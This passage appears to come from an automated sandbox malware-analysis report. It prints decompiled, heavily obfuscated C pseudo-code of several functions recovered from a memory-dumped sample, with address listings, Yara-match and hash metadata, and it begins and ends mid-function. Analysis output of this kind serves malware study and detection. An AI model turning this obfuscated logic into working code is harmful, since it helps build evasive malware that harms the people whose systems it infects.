				_v592 = _v592 ^ 0x10cdfb96;
				_v560 = 0x3078;
				_v560 = _v560 << 8;
				_t244 = _v588;
				_v560 = _v560 / _t243;
				_v560 = _v560 + 0xffff6a19;
				_v560 = _v560 ^ 0x000f142e;
				goto L1;
				do {
					while(1) {
						L1:
						_t249 = _t214 - 0x3227b83a;
						if(_t249 > 0) {
							break;
						}
						if(_t249 == 0) {
							_v584 = 0xc457;
							_v584 = _v584 >> 6;
							_t165 =  &_v584;
							 *_t165 = _v584 ^ 0x0000030d;
							__eflags =  *_t165;
							_t202 =  *0x24ca2c; // 0x698300
							 *((intOrPtr*)(_t202 + 0x218)) = E00247CC2;
							L13:
							_t214 = 0x2ded9275;
							continue;
						}
						if(_t214 == 0xf501058) {
							_push(_t214);
							_push(_t214);
							_t206 = E00238736(0x454);
							 *0x24ca2c = _t206;
							__eflags = _t206;
							if(_t206 == 0) {
								goto L23;
							}
							 *((intOrPtr*)(_t206 + 0x214)) = E002420C5;
							_t214 = 0x382146c2;
							continue;
						}
						if(_t214 == 0x204dd1d9) {
							E0023B112();
							_t214 = 0x354eaa90;
							continue;
						}
						if(_t214 == 0x24baa30b) {
							_v584 = 0xe62c;
							_t214 = 0x36e33d60;
							_v584 = _v584 ^ 0x84d80cbd;
							_v584 = _v584 ^ 0x84d8eab8;
							continue;
						}
						if(_t214 != 0x2ded9275) {
							goto L22;
						}
						_push(_t214);
						_push(_t214);
						E0023C6C7(_v536, _v572,  *0x24ca2c, _t214, _v528, _v584, _v544); // executed
						_t247 =  &(_t247[7]);
						_t214 = 0x204dd1d9;
						_t210 = 1;
						_t245 =  ==  ? _t210 : _t245;
					}
					__eflags = _t214 - 0x354eaa90;
					if(__eflags == 0) {
						E00243E3F(_t214,  &_v520, __eflags, _v552, _v564);
						_t200 = E0023E29C(_v576, _v592,  &_v520);
						_t216 =  *0x24ca2c; // 0x698300
						_t247 =  &(_t247[3]);
						 *((intOrPtr*)(_t216 + 0x438)) = _t200;
						_t214 = 0xae4e76a;
						goto L22;
					}
					__eflags = _t214 - 0x36e33d60;
					if(_t214 == 0x36e33d60) {
						E00235FB2(_v540, _v556, _t244);
						goto L13;
					}
					__eflags = _t214 - 0x382146c2;
					if(_t214 != 0x382146c2) {
						goto L22;
					}
					_t211 = E00232959(_t214, _v548, _v588, _v580, _v560); // executed
					_t244 = _t211;
					_t247 =  &(_t247[4]);
					__eflags = _t244;
					if(_t244 == 0) {
						_t214 = 0x3227b83a;
					} else {
						_t212 =  *0x24ca2c; // 0x698300
						 *((intOrPtr*)(_t212 + 0x224)) = 1;
						_t214 = 0x24baa30b;
					}
					goto L1;
					L22:
					__eflags = _t214 - 0xae4e76a;
				} while (_t214 != 0xae4e76a);
				L23:
				return _t245;
			}







































                                                      0x00244b41
                                                      0x00244b47
                                                      0x00244b50
                                                      0x00244b54
                                                      0x00244b59
                                                      0x00244b5d
                                                      0x00244b64
                                                      0x00244b75
                                                      0x00244b79
                                                      0x00244b7b
                                                      0x00244b83
                                                      0x00244b91
                                                      0x00244b96
                                                      0x00244ba1
                                                      0x00244ba4
                                                      0x00244ba8
                                                      0x00244bad
                                                      0x00244bb5
                                                      0x00244bbd
                                                      0x00244bc2
                                                      0x00244bca
                                                      0x00244bd2
                                                      0x00244bda
                                                      0x00244be2
                                                      0x00244bea
                                                      0x00244bef
                                                      0x00244bf4
                                                      0x00244bfc
                                                      0x00244c04
                                                      0x00244c0c
                                                      0x00244c14
                                                      0x00244c1c
                                                      0x00244c2c
                                                      0x00244c30
                                                      0x00244c35
                                                      0x00244c3d
                                                      0x00244c45
                                                      0x00244c4d
                                                      0x00244c55
                                                      0x00244c5d
                                                      0x00244c6a
                                                      0x00244c6d
                                                      0x00244c71
                                                      0x00244c79
                                                      0x00244c81
                                                      0x00244c89
                                                      0x00244c91
                                                      0x00244c99
                                                      0x00244ca6
                                                      0x00244cb2
                                                      0x00244cb6
                                                      0x00244cbb
                                                      0x00244cc3
                                                      0x00244ccf
                                                      0x00244cd2
                                                      0x00244cd6
                                                      0x00244cde
                                                      0x00244ce6
                                                      0x00244cf7
                                                      0x00244d02
                                                      0x00244d06
                                                      0x00244d0e
                                                      0x00244d16
                                                      0x00244d1e
                                                      0x00244d26
                                                      0x00244d2e
                                                      0x00244d36
                                                      0x00244d3e
                                                      0x00244d46
                                                      0x00244d4e
                                                      0x00244d56
                                                      0x00244d5e
                                                      0x00244d66
                                                      0x00244d6e
                                                      0x00244d76
                                                      0x00244d7e
                                                      0x00244d8b
                                                      0x00244d8f
                                                      0x00244d97
                                                      0x00244d9f
                                                      0x00244da7
                                                      0x00244db2
                                                      0x00244db6
                                                      0x00244dba
                                                      0x00244dc2
                                                      0x00244dc2
                                                      0x00244dca
                                                      0x00244dca
                                                      0x00244dca
                                                      0x00244dca
                                                      0x00244dcc
                                                      0x00000000
                                                      0x00000000
                                                      0x00244dd2
                                                      0x00244e98
                                                      0x00244ea0
                                                      0x00244ea5
                                                      0x00244ea5
                                                      0x00244ea5
                                                      0x00244ead
                                                      0x00244eb2
                                                      0x00244ebc
                                                      0x00244ebc
                                                      0x00000000
                                                      0x00244ebc
                                                      0x00244dde
                                                      0x00244e69
                                                      0x00244e6a
                                                      0x00244e70
                                                      0x00244e75
                                                      0x00244e7c
                                                      0x00244e7e
                                                      0x00000000
                                                      0x00000000
                                                      0x00244e84
                                                      0x00244e8e
                                                      0x00000000
                                                      0x00244e8e
                                                      0x00244de6
                                                      0x00244e4e
                                                      0x00244e53
                                                      0x00000000
                                                      0x00244e53
                                                      0x00244dee
                                                      0x00244e2c
                                                      0x00244e34
                                                      0x00244e39
                                                      0x00244e41
                                                      0x00000000
                                                      0x00244e41
                                                      0x00244df2
                                                      0x00000000
                                                      0x00000000
                                                      0x00244df8
                                                      0x00244df9
                                                      0x00244e15
                                                      0x00244e1a
                                                      0x00244e1d
                                                      0x00244e26
                                                      0x00244e27
                                                      0x00244e27
                                                      0x00244ec3
                                                      0x00244ec9
                                                      0x00244f39
                                                      0x00244f4b
                                                      0x00244f50
                                                      0x00244f56
                                                      0x00244f59
                                                      0x00244f5f
                                                      0x00000000
                                                      0x00244f5f
                                                      0x00244ecb
                                                      0x00244ed1
                                                      0x00244f25
                                                      0x00000000
                                                      0x00244f2a
                                                      0x00244ed3
                                                      0x00244ed9
                                                      0x00000000
                                                      0x00000000
                                                      0x00244eef
                                                      0x00244ef4
                                                      0x00244ef6
                                                      0x00244ef9
                                                      0x00244efb
                                                      0x00244f15
                                                      0x00244efd
                                                      0x00244efd
                                                      0x00244f05
                                                      0x00244f0b
                                                      0x00244f0b
                                                      0x00000000
                                                      0x00244f64
                                                      0x00244f64
                                                      0x00244f64
                                                      0x00244f71
                                                      0x00244f7c

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: !yG$,$8b$Q$`=6$`=6$j$j$o9$x0$ $X
                                                      • API String ID: 0-3958274775
                                                      • Opcode ID: 151cea3ad7c89dd702ee93776cf97ea4601d4e6957da9cf5090533907b0e08b0
                                                      • Instruction ID: 5f43662d51b6feda9cbbe9d5ae60ba3e4508172afbd750758477588350ad9d1d
                                                      • Opcode Fuzzy Hash: 151cea3ad7c89dd702ee93776cf97ea4601d4e6957da9cf5090533907b0e08b0
                                                      • Instruction Fuzzy Hash: 73A175716183819FD358DF64C48A52BFBE1FBC4358F204A1DF1969A2A0C7B8CA59CF46
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00243895, Relevance: 12.8, Strings: 10, Instructions: 274COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E00243895() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				unsigned int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _v700;
				signed int _t281;
				intOrPtr _t284;
				void* _t286;
				void* _t290;
				void* _t294;
				void* _t295;
				char _t297;
				void* _t303;
				intOrPtr _t321;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int* _t331;

				_t331 =  &_v700;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t295 = 0x16120aa4;
				_v536 = 0x65127b;
				_v664 = 0x3b49;
				_v664 = _v664 << 5;
				_v664 = _v664 + 0x6a36;
				_v664 = _v664 >> 7;
				_v664 = _v664 ^ 0x00000fa7;
				_v616 = 0x772f;
				_v616 = _v616 ^ 0x73b15b69;
				_v616 = _v616 ^ 0x73b12d46;
				_v604 = 0xe6c8;
				_v604 = _v604 + 0x8155;
				_v604 = _v604 ^ 0x000105e4;
				_v700 = 0xa5d;
				_v700 = _v700 * 0x52;
				_t294 = 0;
				_v700 = _v700 + 0xffffecf8;
				_t325 = 0x58;
				_v700 = _v700 * 0x66;
				_v700 = _v700 ^ 0x014b32de;
				_v684 = 0xc8e0;
				_v684 = _v684 + 0x308b;
				_v684 = _v684 + 0x2664;
				_v684 = _v684 >> 6;
				_v684 = _v684 ^ 0x00006abe;
				_v676 = 0x796a;
				_v676 = _v676 + 0xffff196c;
				_v676 = _v676 + 0xffffd40e;
				_v676 = _v676 ^ 0xd773f48b;
				_v676 = _v676 ^ 0x288ceae9;
				_v612 = 0x157c;
				_v612 = _v612 << 0x10;
				_v612 = _v612 ^ 0x157c11c9;
				_v652 = 0xe7a2;
				_v652 = _v652 / _t325;
				_v652 = _v652 | 0x448e2e0d;
				_v652 = _v652 ^ 0x448e7eb8;
				_v640 = 0x3ee9;
				_v640 = _v640 * 0x5d;
				_v640 = _v640 >> 0xd;
				_v640 = _v640 ^ 0x0000282d;
				_v648 = 0xf425;
				_v648 = _v648 * 9;
				_v648 = _v648 >> 1;
				_v648 = _v648 ^ 0x0004354a;
				_v608 = 0x24ee;
				_v608 = _v608 + 0x809c;
				_v608 = _v608 ^ 0x0000fdeb;
				_v636 = 0x6dae;
				_v636 = _v636 + 0x1c44;
				_v636 = _v636 + 0x2b83;
				_v636 = _v636 ^ 0x0000a12d;
				_v656 = 0xe590;
				_v656 = _v656 >> 2;
				_v656 = _v656 << 7;
				_v656 = _v656 ^ 0x001cffcc;
				_v668 = 0xb9db;
				_v668 = _v668 >> 0xd;
				_v668 = _v668 + 0x89dd;
				_v668 = _v668 | 0xbce2fd3c;
				_v668 = _v668 ^ 0xbce2f9c6;
				_v596 = 0x1790;
				_v596 = _v596 + 0xffff27ec;
				_v596 = _v596 ^ 0xffff59a3;
				_v672 = 0xffb9;
				_v672 = _v672 + 0xffff618d;
				_v672 = _v672 >> 2;
				_t326 = 0x31;
				_v672 = _v672 * 0x75;
				_v672 = _v672 ^ 0x000b38e4;
				_v644 = 0xc4de;
				_v644 = _v644 + 0xbfb6;
				_v644 = _v644 ^ 0xc1434f22;
				_v644 = _v644 ^ 0xc142a5f5;
				_v680 = 0x8a5a;
				_v680 = _v680 | 0x8f6cf4f7;
				_v680 = _v680 + 0x838e;
				_v680 = _v680 + 0xffffa8f9;
				_v680 = _v680 ^ 0x8f6d4033;
				_v660 = 0xe8e2;
				_v660 = _v660 / _t326;
				_t327 = 0x25;
				_v660 = _v660 * 0x78;
				_v660 = _v660 ^ 0x000205be;
				_v688 = 0x9cd0;
				_v688 = _v688 + 0x8e7d;
				_v688 = _v688 * 0x26;
				_v688 = _v688 * 0x51;
				_v688 = _v688 ^ 0x0e0ecd55;
				_v620 = 0xe1b5;
				_v620 = _v620 / _t327;
				_v620 = _v620 ^ 0x00005557;
				_v696 = 0x769d;
				_v696 = _v696 >> 7;
				_v696 = _v696 | 0x5538ae99;
				_v696 = _v696 << 2;
				_v696 = _v696 ^ 0x54e2b31f;
				_v600 = 0xdcef;
				_v600 = _v600 << 6;
				_v600 = _v600 ^ 0x003705ca;
				_v624 = 0x48eb;
				_v624 = _v624 >> 0xd;
				_v624 = _v624 ^ 0x00002379;
				_v692 = 0xfa2c;
				_v692 = _v692 | 0x4759ecfd;
				_v692 = _v692 >> 0xc;
				_v692 = _v692 >> 9;
				_v692 = _v692 ^ 0x000062c4;
				_v632 = 0xbcd9;
				_v632 = _v632 << 4;
				_v632 = _v632 | 0x68c1d353;
				_v632 = _v632 ^ 0x68cbf855;
				_v628 = 0x848;
				_t328 = 0x1c;
				_v628 = _v628 / _t328;
				_v628 = _v628 ^ 0x00001dd4;
				_t324 = _v628;
				_v592 = 0xa720;
				_v592 = _v592 + 0xffff9569;
				_v592 = _v592 ^ 0x00003c8a;
				do {
					while(_t295 != 0x2b0230e) {
						if(_t295 == 0x16120aa4) {
							_t295 = 0x182cddf3;
							continue;
						} else {
							if(_t295 == 0x182cddf3) {
								E0024AAAE(_v604, _v700, _v684,  &_v588, _v676);
								_t331 =  &(_t331[3]);
								_t295 = 0x2f4d7b3a;
								continue;
							} else {
								if(_t295 == 0x1c4d16fa) {
									_t284 = _v584;
									_t297 = _v588;
									_v548 = _v548 & 0x00000000;
									_v576 = _t284;
									_v568 = _t284;
									_v560 = _t284;
									_v552 = _t284;
									_v580 = _t297;
									_v572 = _t297;
									_v564 = _t297;
									_v556 = _t297;
									_t286 = E0023B6DD(_t297, _v600, _t297, _t324, _v624,  &_v580, _v692); // executed
									_t331 =  &(_t331[5]);
									__eflags = _t286;
									_t294 =  !=  ? 1 : _t294;
									_t295 = 0x2a39a402;
									continue;
								} else {
									if(_t295 == 0x2a39a402) {
										E00244F7D(_v632, _v628, _t324);
									} else {
										if(_t295 == 0x2f4d7b3a) {
											_v588 = _v588 - E0023F46D();
											_t295 = 0x369a1b5f;
											asm("sbb [esp+0x84], edx");
											continue;
										} else {
											_t339 = _t295 - 0x369a1b5f;
											if(_t295 != 0x369a1b5f) {
												goto L16;
											} else {
												_push(_v652);
												_t290 = E0024889D(0x24c9b0, _v612, _t339);
												_pop(_t303);
												_t321 =  *0x24ca2c; // 0x698300
												_t224 = _t321 + 0x230; // 0x7a0043
												E0023C680(_t224, _v648, _v608, _t303, _v636,  *0x24ca2c, _t290,  &_v524);
												_t331 =  &(_t331[7]);
												E00242025(_v656, _t290, _v668, _v596);
												_t295 = 0x2b0230e;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t294;
					}
					_t281 = E0023B566(_t295, _v664, _v672, _v644, _v616, _v680, _t295, _v660, _v688, 0, _v620, _v696, _v592,  &_v524); // executed
					_t324 = _t281;
					_t331 =  &(_t331[0xc]);
					__eflags = _t281 - 0xffffffff;
					if(__eflags == 0) {
						_t295 = 0x1d984ba2;
						goto L16;
					} else {
						_t295 = 0x1c4d16fa;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t295 - 0x1d984ba2;
				} while (__eflags != 0);
				goto L19;
			}




























































                                                      0x00243895
                                                      0x0024389b
                                                      0x002438a5
                                                      0x002438ad
                                                      0x002438b2
                                                      0x002438bd
                                                      0x002438c5
                                                      0x002438ca
                                                      0x002438d2
                                                      0x002438d7
                                                      0x002438df
                                                      0x002438e7
                                                      0x002438ef
                                                      0x002438f7
                                                      0x002438ff
                                                      0x00243907
                                                      0x0024390f
                                                      0x0024391e
                                                      0x00243922
                                                      0x00243924
                                                      0x00243933
                                                      0x00243934
                                                      0x00243938
                                                      0x00243940
                                                      0x00243948
                                                      0x00243950
                                                      0x00243958
                                                      0x0024395d
                                                      0x00243965
                                                      0x0024396d
                                                      0x00243975
                                                      0x0024397d
                                                      0x00243985
                                                      0x0024398d
                                                      0x00243995
                                                      0x0024399a
                                                      0x002439a2
                                                      0x002439b0
                                                      0x002439b4
                                                      0x002439bc
                                                      0x002439c4
                                                      0x002439d1
                                                      0x002439d5
                                                      0x002439da
                                                      0x002439e2
                                                      0x002439ef
                                                      0x002439f3
                                                      0x002439f7
                                                      0x002439ff
                                                      0x00243a07
                                                      0x00243a0f
                                                      0x00243a17
                                                      0x00243a1f
                                                      0x00243a27
                                                      0x00243a2f
                                                      0x00243a37
                                                      0x00243a3f
                                                      0x00243a44
                                                      0x00243a49
                                                      0x00243a51
                                                      0x00243a59
                                                      0x00243a5e
                                                      0x00243a66
                                                      0x00243a6e
                                                      0x00243a76
                                                      0x00243a7e
                                                      0x00243a86
                                                      0x00243a8e
                                                      0x00243a96
                                                      0x00243a9e
                                                      0x00243aac
                                                      0x00243ab4
                                                      0x00243ab8
                                                      0x00243ac0
                                                      0x00243ac8
                                                      0x00243ad0
                                                      0x00243ad8
                                                      0x00243ae0
                                                      0x00243ae8
                                                      0x00243af0
                                                      0x00243af8
                                                      0x00243b00
                                                      0x00243b08
                                                      0x00243b18
                                                      0x00243b21
                                                      0x00243b24
                                                      0x00243b28
                                                      0x00243b30
                                                      0x00243b38
                                                      0x00243b45
                                                      0x00243b4e
                                                      0x00243b52
                                                      0x00243b5a
                                                      0x00243b6a
                                                      0x00243b6e
                                                      0x00243b76
                                                      0x00243b7e
                                                      0x00243b83
                                                      0x00243b8b
                                                      0x00243b90
                                                      0x00243b98
                                                      0x00243ba0
                                                      0x00243ba5
                                                      0x00243bad
                                                      0x00243bb5
                                                      0x00243bba
                                                      0x00243bc2
                                                      0x00243bca
                                                      0x00243bd2
                                                      0x00243bd7
                                                      0x00243bdc
                                                      0x00243be4
                                                      0x00243bec
                                                      0x00243bf1
                                                      0x00243bf9
                                                      0x00243c01
                                                      0x00243c0d
                                                      0x00243c10
                                                      0x00243c14
                                                      0x00243c1c
                                                      0x00243c20
                                                      0x00243c28
                                                      0x00243c30
                                                      0x00243c38
                                                      0x00243c38
                                                      0x00243c4a
                                                      0x00243db7
                                                      0x00000000
                                                      0x00243c50
                                                      0x00243c52
                                                      0x00243da5
                                                      0x00243daa
                                                      0x00243dad
                                                      0x00000000
                                                      0x00243c58
                                                      0x00243c5e
                                                      0x00243d0c
                                                      0x00243d17
                                                      0x00243d1e
                                                      0x00243d26
                                                      0x00243d2d
                                                      0x00243d34
                                                      0x00243d3b
                                                      0x00243d57
                                                      0x00243d5e
                                                      0x00243d65
                                                      0x00243d6c
                                                      0x00243d73
                                                      0x00243d7a
                                                      0x00243d7e
                                                      0x00243d80
                                                      0x00243d83
                                                      0x00000000
                                                      0x00243c64
                                                      0x00243c6a
                                                      0x00243e2c
                                                      0x00243c70
                                                      0x00243c76
                                                      0x00243cf4
                                                      0x00243cfb
                                                      0x00243d00
                                                      0x00000000
                                                      0x00243c78
                                                      0x00243c78
                                                      0x00243c7e
                                                      0x00000000
                                                      0x00243c84
                                                      0x00243c84
                                                      0x00243c91
                                                      0x00243c96
                                                      0x00243cb8
                                                      0x00243cc2
                                                      0x00243cc8
                                                      0x00243ccd
                                                      0x00243cde
                                                      0x00243ce5
                                                      0x00000000
                                                      0x00243ce5
                                                      0x00243c7e
                                                      0x00243c76
                                                      0x00243c6a
                                                      0x00243c5e
                                                      0x00243c52
                                                      0x00243e35
                                                      0x00243e3e
                                                      0x00243e3e
                                                      0x00243df7
                                                      0x00243dfc
                                                      0x00243dfe
                                                      0x00243e01
                                                      0x00243e04
                                                      0x00243e10
                                                      0x00000000
                                                      0x00243e06
                                                      0x00243e06
                                                      0x00000000
                                                      0x00243e06
                                                      0x00000000
                                                      0x00243e15
                                                      0x00243e15
                                                      0x00243e15
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: -($/w$6j$:{M/$:{M/$WU$d&$jy$y#$$
                                                      • API String ID: 2962429428-1089002639
                                                      • Opcode ID: b3f48b49e59c2932c5d35d0efdb0a0d1c277be50cc8838aa8ebf4da9b29d3289
                                                      • Instruction ID: 952bdb02c812a16a9a321b22c93aee58147aeeb9372d14efb3e83a78715db55e
                                                      • Opcode Fuzzy Hash: b3f48b49e59c2932c5d35d0efdb0a0d1c277be50cc8838aa8ebf4da9b29d3289
                                                      • Instruction Fuzzy Hash: 0BD101715183819FE368CF25C489A5BFBE1BBC4358F108A1DF1D9862A0D7B98959CF43
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002442DA, Relevance: 7.9, Strings: 6, Instructions: 373COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E002442DA(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				unsigned int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				intOrPtr _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				void* _t336;
				intOrPtr _t357;
				intOrPtr _t361;
				void* _t365;
				signed int _t368;
				intOrPtr _t379;
				intOrPtr _t380;
				void* _t413;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				intOrPtr* _t428;
				signed int _t431;
				signed int* _t437;
				void* _t439;

				_t380 = __ecx;
				_push(_a16);
				_v148 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t336);
				_v32 = 0x4bc1;
				_t437 =  &(( &_v172)[6]);
				_v32 = _v32 >> 0xf;
				_v32 = _v32 ^ 0x000002f8;
				_t379 = 0;
				_v168 = 0xbc3a;
				_t431 = 0x3b64c246;
				_v168 = _v168 >> 0xa;
				_t435 = 0;
				_v168 = _v168 << 1;
				_v168 = _v168 << 9;
				_v168 = _v168 ^ 0x0000918a;
				_v96 = 0x296c;
				_v96 = _v96 ^ 0xfe254c59;
				_v96 = _v96 >> 0xf;
				_v96 = _v96 ^ 0x0001a08f;
				_v52 = 0x7e94;
				_v52 = _v52 + 0xffff276a;
				_v52 = _v52 ^ 0xffffb392;
				_v156 = 0x71e;
				_v156 = _v156 << 0xa;
				_v156 = _v156 ^ 0x91e5be42;
				_v156 = _v156 | 0xf592e812;
				_v156 = _v156 ^ 0xf5fb9c3d;
				_v60 = 0xbf5e;
				_v60 = _v60 >> 7;
				_v60 = _v60 ^ 0x00001130;
				_v112 = 0x687f;
				_v112 = _v112 | 0xf46ca00f;
				_t421 = 0x35;
				_v112 = _v112 * 0x78;
				_v112 = _v112 ^ 0x930cd2b7;
				_v152 = 0xc857;
				_v152 = _v152 << 5;
				_v152 = _v152 | 0x37c6acdc;
				_v152 = _v152 + 0xffffd100;
				_v152 = _v152 ^ 0x37df0477;
				_v144 = 0xf477;
				_v144 = _v144 >> 2;
				_v144 = _v144 << 5;
				_v144 = _v144 | 0xf3531cc7;
				_v144 = _v144 ^ 0xf357d736;
				_v120 = 0xcb9;
				_v120 = _v120 + 0xe3f9;
				_v120 = _v120 ^ 0x6ced8dd9;
				_v120 = _v120 ^ 0x6ced4b8c;
				_v20 = 0x5e2b;
				_v20 = _v20 + 0xffff1e4f;
				_v20 = _v20 ^ 0xffff4ba5;
				_v124 = 0x4b0e;
				_v124 = _v124 / _t421;
				_t422 = 0x44;
				_v124 = _v124 / _t422;
				_v124 = _v124 ^ 0x00000f50;
				_v92 = 0x1f74;
				_v92 = _v92 + 0xffffb151;
				_v92 = _v92 ^ 0xde981c2c;
				_v92 = _v92 ^ 0x2167c13f;
				_v48 = 0x349e;
				_v48 = _v48 | 0xa536c816;
				_v48 = _v48 ^ 0xa536ef12;
				_v172 = 0xab81;
				_t423 = 0x46;
				_v172 = _v172 * 0x33;
				_v172 = _v172 + 0xffff1acb;
				_v172 = _v172 ^ 0xbb3feb59;
				_v172 = _v172 ^ 0xbb1e804f;
				_v72 = 0x6207;
				_v72 = _v72 + 0xffff8a84;
				_v72 = _v72 ^ 0xffffdea5;
				_v80 = 0xb702;
				_v80 = _v80 * 0x71;
				_v80 = _v80 + 0xffff1180;
				_v80 = _v80 ^ 0x004fd1d8;
				_v40 = 0x81cb;
				_v40 = _v40 * 0x24;
				_v40 = _v40 ^ 0x001275f3;
				_v88 = 0x5eb0;
				_v88 = _v88 >> 3;
				_v88 = _v88 + 0x92b4;
				_v88 = _v88 ^ 0x0000b644;
				_v160 = 0x12e7;
				_v160 = _v160 ^ 0x069a79b3;
				_v160 = _v160 / _t423;
				_v160 = _v160 << 0xd;
				_v160 = _v160 ^ 0x04c33b64;
				_v84 = 0xf1f4;
				_v84 = _v84 | 0x342cde3b;
				_t424 = 0x1c;
				_v84 = _v84 / _t424;
				_v84 = _v84 ^ 0x01dd3282;
				_v116 = 0xb146;
				_t425 = 0x4f;
				_v116 = _v116 * 0x6c;
				_v116 = _v116 + 0xbfc7;
				_v116 = _v116 ^ 0x004bdc24;
				_v76 = 0x885c;
				_v76 = _v76 >> 3;
				_v76 = _v76 ^ 0x00003fd1;
				_v56 = 0xb3ed;
				_v56 = _v56 + 0xffff0d01;
				_v56 = _v56 ^ 0xffffed6a;
				_v108 = 0xc622;
				_v108 = _v108 | 0x10712732;
				_v108 = _v108 ^ 0x74f95923;
				_v108 = _v108 ^ 0x648892da;
				_v128 = 0x5bd2;
				_v128 = _v128 + 0x6edf;
				_v128 = _v128 >> 2;
				_v128 = _v128 ^ 0x00004896;
				_v164 = 0xe1b;
				_v164 = _v164 / _t425;
				_v164 = _v164 + 0xf341;
				_v164 = _v164 >> 0xb;
				_v164 = _v164 ^ 0x00001a6d;
				_v104 = 0x25ae;
				_v104 = _v104 ^ 0xe14689b4;
				_v104 = _v104 ^ 0x501c8677;
				_v104 = _v104 ^ 0xb15a3e2e;
				_v100 = 0xf2b8;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0x7f8b;
				_v100 = _v100 ^ 0x0000c2a8;
				_v64 = 0x78fc;
				_t426 = 0x2a;
				_v64 = _v64 / _t426;
				_v64 = _v64 ^ 0x000003c6;
				_v28 = 0x315;
				_v28 = _v28 | 0x8467cf1c;
				_v28 = _v28 ^ 0x84678c6c;
				_v36 = 0x48e3;
				_v36 = _v36 << 0x10;
				_v36 = _v36 ^ 0x48e34564;
				_v140 = 0xd9da;
				_v140 = _v140 ^ 0xccfa4b87;
				_v140 = _v140 >> 8;
				_v140 = _v140 + 0xb0ba;
				_v140 = _v140 ^ 0x00cde1b8;
				_v44 = 0xbd19;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x000065c0;
				_v136 = 0xd203;
				_v136 = _v136 | 0x5349dfd2;
				_v136 = _v136 + 0xffffa76d;
				_v136 = _v136 ^ 0xc21cb162;
				_v136 = _v136 ^ 0x91553623;
				_v24 = 0x8da7;
				_v24 = _v24 + 0xffff55dc;
				_v24 = _v24 ^ 0xffffe382;
				_v68 = 0xcfb5;
				_t427 = 0x28;
				_v68 = _v68 / _t427;
				_v68 = _v68 ^ 0x00000530;
				_t428 = _v12;
				_t357 = _v132;
				while(1) {
					L1:
					while(1) {
						_t439 = _t431 - 0x28e290b2;
						if(_t439 > 0) {
							goto L18;
						}
						L3:
						if(_t439 == 0) {
							_t386 = _t379;
							_t365 = E0024A970(_t379, _v112, _v152, _v144,  &_v4, _v120, _t380, _t380, _a12, _v20, _t380, _v124, _t380,  &_v12, _t380, _t380, _v92);
							_t437 =  &(_t437[0xf]);
							if(_t365 == 0) {
								L24:
								_t431 = 0x1c1c4d3a;
								goto L11;
							} else {
								_t368 = E00248C8F(_t386);
								_t431 = 0x30519b83;
								_t357 = _v12 * 0x2c + _t379;
								_v132 = _t357;
								_t428 =  >=  ? _t379 : (_t368 & 0x0000001f) * 0x2c + _t379;
								goto L12;
							}
							L34:
						} else {
							if(_t431 == _t413) {
								E002494DB(_v160, _v84, _t435,  &_v8, _v116, _v136, _v16, _v76);
								_t431 =  !=  ? 0x33392e52 : 0x221cfa57;
								_t357 = E00235FB2(_v56, _v108, _v16);
								_t437 =  &(_t437[8]);
								L29:
								_t380 = _v148;
								_t413 = 0x10c975df;
								goto L30;
							} else {
								if(_t431 == 0x1c1c4d3a) {
									E0023F536(_v100, _v64, _v28, _t435);
									_t431 = 0x205a5796;
									goto L11;
								} else {
									if(_t431 == 0x205a5796) {
										return E0023F536(_v36, _v140, _v44, _t379);
									}
